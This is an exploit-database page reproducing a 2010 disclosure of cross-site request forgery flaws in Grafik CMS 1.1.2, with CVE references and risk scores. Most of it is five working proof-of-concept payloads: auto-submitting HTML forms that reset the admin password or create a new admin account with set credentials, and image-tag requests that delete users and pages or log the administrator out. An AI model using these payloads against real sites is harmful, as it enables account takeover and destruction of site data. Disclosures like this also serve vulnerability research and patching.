Grafik CMS 1.1.2 - Multiple Cross-Site Request Forgery Vulnerabilities
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| CVE-2010-2615 | 12 Jul 201000:00 | – | circl | |
| CVE-2010-2615 | 1 Jul 201021:00 | – | cve | |
| CVE-2010-2615 | 1 Jul 201021:00 | – | cvelist | |
| EUVD-2010-2619 | 7 Oct 202500:30 | – | euvd | |
| Cross-site Scripting (XSS) Vulnerabilities in Grafik CMS | 14 Jun 201000:00 | – | htbridge | |
| CVE-2010-2615 | 2 Jul 201012:44 | – | nvd | |
| Cross site scripting | 2 Jul 201012:44 | – | prion |
<!---
Title: Grafik CMS 1.1.2 Multiple CSRF Vulnerabilities
Author: 10n1z3d <10n1z3d[at]w[dot]cn>
Date: Mon 12 Jul 2010 07:07:22 PM EEST
Vendor: http://www.grafik-power.com/grafik_cms/
Download: None
--->
-=[ CSRF PoC 1 - Change Admin Password ]=-
<html>
<head>
<title>Grafik CMS 1.1.2 Multiple CSRF Vulnerabilities - Change Admin Password</title>
</head>
<body onload="document.csrf.submit();">
<form name="csrf" action="http://[domain]/admin/admin.php?action=edit_user&id=1" method="post">
<!--- Edit these --->
<input type="hidden" name="name" value="root" />
<input type="hidden" name="username" value="root" />
<input type="hidden" name="password" value="rootroot" />
</form>
</body>
</html>
-=[ CSRF PoC 2 - Create Admin User ]=-
<html>
<head>
<title>Grafik CMS 1.1.2 Multiple CSRF Vulnerabilities - Create Admin User</title>
</head>
<body onload="document.csrf.submit();">
<form name="csrf" action="http://[domain]/admin/admin.php?action=add_user" method="post">
<!--- Edit these --->
<input type="hidden" name="name" value="root" />
<input type="hidden" name="username" value="root" />
<input type="hidden" name="password" value="rootroot" />
</form>
</body>
</html>
-=[ CSRF PoC 3 - Delete User ]=-
<img src="http://[domain]/admin/admin.php?action=liste_user&del=[user id]" alt="Do you see this?" />
-=[ CSRF PoC 4 - Delete Page ]=-
<img src="http://[domain]/admin/admin.php?action=liste_pages&del=[page id]" alt="Do you see this?" />
-=[ CSRF PoC 5 - Logout The Administrator ]=-
<img src="http://[domain]/admin/index.php?action=deconnexion" alt="Do you see this?" />
<!---
http://www.evilzone.org/
irc.evilzone.org (6697 / 9999)
--->Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jul 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.01452